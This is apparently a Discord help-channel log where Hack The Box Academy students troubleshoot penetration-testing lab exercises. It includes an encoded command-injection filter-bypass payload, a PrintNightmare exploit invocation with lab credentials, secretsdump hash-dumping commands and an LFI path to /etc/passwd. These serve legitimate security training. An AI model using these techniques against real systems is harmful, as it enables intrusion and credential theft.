Is this a question whose answer you have too look up(which I already did and foudn it to be the correct answer...I both found it in the module and googled it) or do you have too use the tools mentioned in the module to find the password length? I used one of the tools...and even though it gave me a minimum passwordlength it was the inccorrect one.

"https://academy.hackthebox.com/module/143/section/1490"

"What is the default Minimum password length when a new domain is created? (One number) "

look at the question after that and you'll know why it's wrong

But this doesnt get you to breakout from the restricted shell.

you’re right, it doesn’t

please implement 0 star ratings for server side attacks module

I tried something entirely out of scope in the module to get a shell.

hi im having issues with the bleeding edge module im trying to use the metasploit but it just doesnt do anything and ive been stuck on this for a while the module does not say which boxs certain commands go into can some one assist me with this?

I am doing the 'Attacking Common Services' module and things seem to be messed up on the target server. I have found a valid login for FTP, but the flag within the home dir and the login itself appear to be answers to the SMB portion of the module? And there appears to be no correct answers to the FTP portion?

Anyone else experienced this?

Also, the SMB section states to login via SSH to retrieve the flag, but I am unable to do so with these creds. Instead, I can login via FTP and get the flag there. Very bizarre

I used the command where I specify the 'minPwdLength' and when I entered the result it returned , that was the correct one. I am not sure how that is related to the first quesiton

the first question asked for the default min pass length for a new domain, the second asked for the default pass length for the inlanefreight domain, which has changed the default length

Hey everyone! New guys here. I just completed my first attack in the Public Exploits module using a wordpress exploit to get a file read of the /flag.txt

However, I only reached the flag by just guessing that I should look for a /flag.txt file path. Is there a way to enumerate through the directories that I'm just not remembering? gobuster didn't seem to offer any web directories

Okay. So for the first question would that have been something I only have to look up(which I did) or is it a question I could have ALSO found with any of the following commands mentioned in the module

never mind

was my mistake

if the domain has changed the password policy, then the tools' output wouldn't be the same a the default of a new domain

where is the general channel??

so yes need to look it up

give more info, what have you tried, any errors, etc

...

#general

no access??

how to get access

#welcome

i sent you a dm with an image

ty

send it here, and just a single image doesn't help to troubleshoot

what module and section is this?

It's the getting started module from the penetration tester path, the Public Exploits section

ad enumeration and attacks

bleeding edge

https://discord.com/channels/@me/1189959435406290974/1189959501563043850

it's an LFI, and the path to the flag is given in the question, later modules will introduce what potentially interesting files you can find using that, e.g. /../../../../../../etc/passwd

Thanks for the quick reply! I should have read the question more carefully, wouldn't have spent so much time jamming in random file paths lol. Can you quickly just explain what an LFI is? Sorry nooby question

make sure you set the ip and port right, should be the ip of your attack machine, other than that just follow what's in the section

which machine the attak01 or the base one you start it

local file inclusion is just a vulnerability that lets you read a file on the system when you're not supposed to

the one you ssh into

oh ok

can someone maybe give me some advice as to what may need to change in this command? I just can't seem to figure out what to change with this one...I am working on the command injection assessment...this is what I put into the site after the t= from just selecting a file, but not clicking on the move option yet...from this i do get the maliicous request denied response. Trying to figure out why this won't work and get me the flag..unless i need to actually perform the action of hitting the move button and then input the command I have below, but not sure where to input it at here: ||index.php?to=&from=51459716.txt&finish=1&move=1 ||

||cat ${PATH:0:1}flag.txt ${PATH:0:1}var${PATH:0:1}www${PATH:0:1}html${PATH:0:1}files${PATH:0:1}tmp

%7c%7cbash<<<$(base64%09-d<<<Y2F0ICR7UEFUSDowOjF9ZmxhZy50eHQgJHtQQVRIOjA6MX12YXIke1BBVEg6MDoxfXd3dyR7UEFUSDowOjF9aHRtbCR7UEFUSDowOjF9ZmlsZXMke1BBVEg6MDoxfXRtcA==)||

Can someone DM me maybe so i don't give too much away? or you can just give me a hint here if you want.

im still having trouble im going to restart everything and try again

so first thing is ssh into the attack01 box?

yes that will give you access to the internal network

ok and then?

i keep getting stuck and need to know what im supposed to do following their list is getting me stuck

ok and then?
i keep getting stuck and need to know what im supposed to do following their list is getting me stuck

it’s really not this complicated

@lusty thicket i seem to have overcomplicated it then lol

got it

you were right lol...way overcomplicated it - even the command

just follow the steps, you need to have smb server serving the msfvenom dll, have the handler running on the same ip, and finally run the CVE-2021-1675.py

all of them need to be done within the machine you ssh into, open 3 terminals for it

awesome!

thanks for the hint lol

https://cdn.discordapp.com/attachments/1189959435406290974/1189970212833984662/Screenshot_2023-12-28_105405.png?ex=65a0191f&is=658da41f&hm=abbc637747de4b9fd3248560fc26afafa64e2f8696df07af00eb6fb1d2c3f266&

i get this error

read the error

CVE-2021-1675.py will throw an error if I rememebr right, you just need to get a shell

its almost working i got a tcp handler but whaen using the comand in the pic it just fails

its not sending the stage which i cant get a shell

the smbserver should receive a connection, make sure the dll is in the directory

check PivotAPi box walkthroughs

it is in the directory

your command to generate the payload?

yes both cve 2021-16775 and backupscript are in the home folder

yes both cve 2021-16775 and backupscript are in the home folder

send your command to generate the payload here

and did you set the payload type in msf

sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'

sudo smbserver.py -smb2support CompData /backupscript.dll

it authenitcates succesfully but does not send the stage in msf console

https://cdn.discordapp.com/attachments/1189959435406290974/1189975005338013836/Screenshot_2023-12-28_105405.png?ex=65a01d95&is=658da895&hm=115397807ccd84c8e33cafc581dc7d9076a48adea3fec550f153ada2e52619bb&

none of those are the msfvenom commands

smbserver should point to a directory, not a file

oh ok

i will try

ok so it didnt work i had to reset and everything

are you able to help me?

Anyone familiar with Footprinting Lab - Medium? I see that there are SMB and NFS ports open, smbclient is not working for smb and when I when I mount the NFS server I get access denied and can't open it

navigate with su

I am working on LLMNR/NBT-NS Poisoning - from Windows and I cant seem to RDP into the windows box. I have tried xfreerdp and remmina. I have also restarted the box. I am getting an error that says Certificate verification failure 'self-signed certificate and time out. I am using TCP vpn

has anyone else been having trouble or had this issue in the past?

What am I navigating with su? I was able to see what is in the mounted folder, I don't think this is what I need so am I using su on the smbclient?

‘when I when I mount the NFS server I get access denied and can't open it’

can anyone help me with what im doing wrong in the bleeding edge chapter of ad enumeration and attacks?

idk what else to tell you other than to just follow the module, you also didn't send the msfvenom command when I asked a few times

Maybe /tls-seclevel: 0 parameter in xfreerdp?

Ssc will always fail

because your attack system isn't in the CA store that's signing the certs

That's generally a non-issue for labs

If you're referring to a "black screen" when it connects: hit enter

Troubleshooting the easy thins first. Making sure its not on my end

was putting in compdata backupscript.dll when i was supposed to just put compdata . for the server

thank you it worked

I did say that smbserver needs to point to a dir, . is just a shorthand for current directory

I have did all of the troubleshooting I can think of and keep having the same issue

running nmap now to see if there was a different port than the usual but I doubt it

Try wrapping the password and username in single quotes

did that already and no dice but I will try again

same

the nmap scan confirmed default port but it took a long time. These boxes have been really slow and laggy for me

Try switching vpn servers

I got into the share folder on the NFS server but can't figure out how to open the 1 file that appears to have data in it, any thoughts?

Cat it or cp it to your machine, chown to your user and open it?

¯_(ツ)_/¯

It's one of the few times I will say, navigate as root

Cat and cp are both giving me an error stating the file does not exist

Got it

Are you using the right filename? :p

Was typing the path wrong

Lol

You know for cat and cp they can use relative paths yeah?

Of course it was the easier solution. Thanks.

I've run into that issue a bit

what module was it again? just curious

Yes just entering the path wrong

LLMNR/NBT-NS Poisoning - from Windows

If you're suspecting connection stuff do this: ping <target_ip> -O -l 3 -c 5 if you see any that are way higher than others or even inconsistency: change vpn region

Inveigh.exe is better than invoke-inveigh iirc more interactive

thats what I used, I really liked that you could esc and run commands on it while its running

easy lesson just had the stupid rdp/vpn issue lol. 5 min task otherwise

Yeah that way you can properly stop it once you're sure it's grabbed the info you want

One question, in the module ---> BROKEN AUTHENTICATION, section ---> Brute Force Cookies, question ---> Modify the application session cookie in the /question1/ subdirectory to give yourself access as superuser. What is the flag?, in the cookie, which also takes the current time of the server?

Since I have this but I don't get the cookie

Is there a good resource out there to learn how to use SQL Server Management Studio? I'm trying to figure this out but I do not know SQL at all

Just click things

Attacking common services later goes through cli stuff

Footprinting/SNMP
i used to get the flag just by scanning, but the question says that i need to find the custom script, run it and get the flag output, which i also found, but how im gonna run that script?

By using enum tools you can get the output of the custom script

but does the enum tool 'run' that script?

The tools retrieve the output of the script. That give login details iirc

i just used snmpwalk, so the flag that i see is the output from the /usr/share/flag.sh already?

Yes

It's been a minute since I did the module

But that sounds correct

k i was just wondering why i found the flag without interacting with the script

Because you don't need to run the script

It's already run

You're basically retrieving the log

oh okay

Hi @misty current , following up on Injection Attacks Skills Assessment. I can read files with ||XMLHttpRequest and file:///||, I know which url I want to get, but the same technique with ||XMLHttpRequest and http://|| doesn't work. (Using ||iframe|| works but the result is not complete and not clearly visible.)
Can we DM ?

anyone on HTB repeating requests, module using web proxies. i got the first flag, but this use the burp repeater to find the next flag isnt working, tried grep through all directroies and folders to find HTB or a file named flag elsehwere but coming up empty handed

im looking through all the directories but cant find this second flag file

what did the question say

Try using request repeating to be able to qucikly test command. with that, try looking for the other flag.

inject using the find cmd

i tried that a couple of times but just cant get it to work properly

ive also done grep for HTB

I have been stuck on the Command Injections Assessment for hours. I went through everything else really quickly. I know it is something simple I am missing. The Hint is not helping me because I cannot get anything at the end to work. Has anyone else had this issue?

check the ||root|| dir for the flag😉

what issue?

thank you that worked!!!!

😉

By issue, I meant the hint not actually helping, lol. I know I cannot move or copy the flag.txt file in File Manager box, but I cannot even read it because I am getting told that I cannot mv it. I am just stuck.

using the methods taught in the section

I thought that I did. That is how I was able to get to the point where it says permission denied, but I am not even trying to move it just read it. Man, what a drag.

i think you’re actually supposed to inject an actual payload for that

I have tried a whole bunch of them, but they are wrong. I feel like I am almost there. I at least can see that the flag exists somewhere, but I cannot even get the location of it.

I am just having issues figuring out where I should put the payload. The Hint says at the end, and nothing I put at the end works. The middle kind of works, but I am still getting errors.

it’s very simple payload and not that complicated

Man, that makes me feel even more foolish.

my injection point was something like ||.txt;|| idk if that helps

I will try a few more things then. Thank you. If nothing works, do you think that you can take a look at my payload, please, and maybe point me in the right direction?

of course

Thank you.

the service itself has a functionality that is being marked as malicious

i think that is a hint

when you get ‘malicious request denied’ there it is

Thank you. I did get that part. I have been messing with Burp and Repeater for like two hours now. I did not first check to see what the site could do. That is my fault. I hope to never make that mistake again.

dont mess up with burp

well you can

but just use the browser

??? now I want to throw my keyboard if I have been wasting my time, lol.

first try to figure out why the request is being marked as malicious

if its a legit request

nah, burp is a “browser”

just that you don’t need that here

That I saw right away it was the / that was not there but being interpreted.

its there but url encoded

when it reaches the server is decoded and ofc is part of a blacklist

I am seeing it in the Inspector now but not encoded. In Burp, I was able to use the proper way to use the bad character. Looking at the Hint, nothing I had put in at the end worked.

Correction, resending did not work I had to open the browser again and I see that the error is gone.

i dont know what you are talking about

when you try to move from /tmp to X it gets malicious request denied

because the / from /tmp

I meant to edit that prior message not delete what I had said. I was saying that nothing was updating and I said correction it was basically my fault because I did not open a new page

but do you know how to continue?

I thought I did. The URL stuff is throwing me off a bit. I do have a page after editing that error. Maybe I am not supposed to edit the error. I did try an || but that did not help it bypass the malicious error

first of all if the /tmp part is triggering the deny remove it

and if the command is smth like ‘mv X Y’ try to figure out where to inject

it could be ‘mv X; <evil cmd here>; Y’

among others possibilities

with a bind shell, why is it important when writing what is essentially a socket server on python, to listen on the IP 0.0.0.0?

#module: INJECTION ATTACKS
#section: XPath - Blind Exploitation

#describe:i need help to fix the script to extract the flag
https://academy.hackthebox.com/module/204/section/2226

it’s a wildcard ip

and accepts connections from any interface

I went through and redid everything that I could remember from Burp directly in the browser and I am back at Permission Denied.

Hi, guys!
I'm new in HTB and I want to know if I could do all the career path of pentester free or just with a monthly subscription (asking cuz I saw that the modules costs boxes)

the path isn't gonna be free; as it contains tier 1 and 2 modules

hmm, I think it would be useful to rewrite that clarification to the module "getting started", the wording is a bit poor as of now

tier 0 modules are the only ones that give you back their cost; after that the modules only give back 20% their cost

you only start with 40? cubes i think

1 month plat and 1 month gold should be enough to unlock them

Yo, I am at the hard-lab, I am aboutta get the ||vhd|| file, the problem is that the smb always disconnects and doesn't download it all, hence I can't use ||bitlocker2john|| in order to get the hashes.
Any ideas on what to do?
Password Attacks
Skill Assessement
Hard Lab

Oh ok! tysm 🙂

try a different file transfer method, there's a few different ways

Will do that.

since you're likely using xfreerdp, one of the goated xfreerdp options is mounting a share

by doing /drive:name,/path/to/share/dir/

Sigh...I am trying to avoid that takes so much time.

But...I ain't got much other

wdym takes so much time?

don't DM without asking @analog path

you didn't give context to you having a student email, so didn't recommend student sub

that's the best value

if you're referring to latency stuff: use the TCP vpn download

¯_(ツ)_/¯

Ok, I will take it then 🙂 ty

Yeah, I am using udp , rn.

TCP is better

Thanks for the advice marcie.

Yeah, it's syn ack.

TCP is connection oriented, UDP is not

idek why UDP is an option tbqh

low latency

And it's independent protocol

More like stateless.

Hi guys, did any one manage to finish the skill assesment 2 of the introduction to deserialization module? I'm stuck in the second flag

im on Password Spraying - Making a Target User List in the AD section. I ran the tool and I have the results here. I blacked it out to avoid spoilers. Issue is the task is not accepting the answer

Ad skills assessment starting to piss me off now, I literally rdp 20 min ago with a user, but now connection keeps failing 🥲

ran it again got a new answer and it worked

hapnned to me as well

I have been on this Command Injections for way too long. I cannot get the gosh darn flag. I am right back where I was hours ago because my notes were notvery good

If you are still available, can you please take a look at my injection to see if maybe I have something miss typed, Please?

of course

Thank you. Would it be best to DM?

yes

hey guys i was using my metasploit console through my kali to solve the msf module when i run an exploit it says exploit done but connection failed . i have tried everythig its failing to connect but it does work in the pawnbox . what are the possible mistakes in my kali

Can anyone explain CPE credits to me that are given with htb academy, google has a lot of varying explanations.

CPEs are Continued Professional Education credits; you sign up with your ISC2 number and any progress you make on academy/on main site is counted as credits towards maintaining a cert - as some certs DO require you to either

• renew them every x years
• have your job sign off as the job provides the CPEs
• get enough CPE per x time frame to not need to retake cert exam

... anyone ?

¯_(ツ)_/¯

you did the exact same thing yeah? LHOST/RHOST/RPORT setup

any idea how to access i tried using sqlcmd too

i don't think you need to specify port

though iirc i just used mssqlclient.py

Module: Active Directory Enumeration & Attacks
Section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux
Task: Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

I created a golden ticket and added to the KRB5CCNAME environment variable like shown in the lesson.
But when i try to dump the NTDS hashes using secretsdump with the following command:

secretsdump.py LOGISTICS.INLANEFREIGHT.LOCAL\hacker@172.16.5.5 -k -no-pass -just-dc -outputfile abc

It does not work, no file was created. Is there something wrong with the command ?

wait how to fix it ?

I was just asking for clarification as in: you had the same variables set ¯_(ツ)_/¯

i cant get libnmap python module installed, im getting errors, need it so i can use odat

any errors? and it should be a forward slash in the secretsdump command

There is no error, it just displays: [*] Cleaning up ... Even with forward slash

if you have dependency problems, you may consider using the docker version

pipx install python-libnmap

don't set an output file and use --debug

Apparently there is a problem with the kerberos ticket

The ticket looks expired

the year is 2033

yep and make sure your golden ticket is forged correctly

i'll need to run to full rockyou.txt?

I can't read lol

Make sure there isn't a provided wordlist first

i'll reset the machine and try again

we used the rockyou-10 a lot on this module

you need to use lookupsid to get the domains sid btw, don't copy those in the module, and make sure lookupsid targets DC

yes i did

do the steps again, make sure the sids and hash are correct

Isacademy down?

My box went down out of the blue

They've been known to do that sometimes

Rude of them

screw the oracle footprint, even on pwnbox its running partially, mid process it errors, ima just google the god damn flag xD

don't LOL

for the most part it's fairly copy/paste from the section

okay tomorrow ill continue then

footpriting is long as fuck, take a time or do other modules to take a break

is what i'm doing

It worked now. I just removed the child domain name and replaced the dc ip by its hostname (secretsdump.py h4ck3r@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-user bross). Thanks for the help

are all modules down?

nun of the sites will load

or show up in curl

yh there seem to be a problem

Module: Web Attacks. Section: Bypassing Encoded References.

"Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with 'cat'. You can either calculate the 'contract' parameter value, or calculate the '.pdf' file name directly."

Im hard stuck on the question above for two days now, I assume that the script provided for mass enumeration needs to be modified. I tried to modify numerous ways but don't know what I'm going wrong. Can I DM someone please?

WEB ATTACKS

Bypassing Encoded References

Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with 'cat'. You can either calculate the 'contract' parameter value, or calculate the '.pdf' file name directly.
I found the request with a has in the image attached. I don't know if it's the right request to begin with. But even if it is, I can't unhash the hash parameter and there is a bunch of stuff at the bottom that I dont understand. I also can't find the function that creates the hash in the source code. Any help would be appreciated.

That request is almost definitely unrelated - chrome sends a request to sb-ssl.google.com to check whether the file you're downloading is known to be malicious

Quick question, why do we need to switch to root? I struggled with it as well.looking to clear this concept

it's because if you don't mount it with like -o nolock,no_root_squash or something like that it puts it as the user/group nobody which means you have to navigate it as root

Ok very clear now

Thanks a lot…I was struggling to understand this reasoning

And was very hesitant to ask, as I keep having terrible imposter syndrome and thought I’ll look silly asking basic questions here to all of you

Can I use NordVPN on Starting Point?

??? HTB provides a tunnel vpn to use: (you're required to use it) idk if it works with nord.

you're not the dumbest person in the room if you ask questions

Okay, that is true.

Thanks

also there's almost no reason to use a vpn provider these days

https://help.hackthebox.com/en/articles/6007919-introduction-to-starting-point also for help with starting point machines you'll need to link your account following instructions in #welcome and you'll have access to #starting-point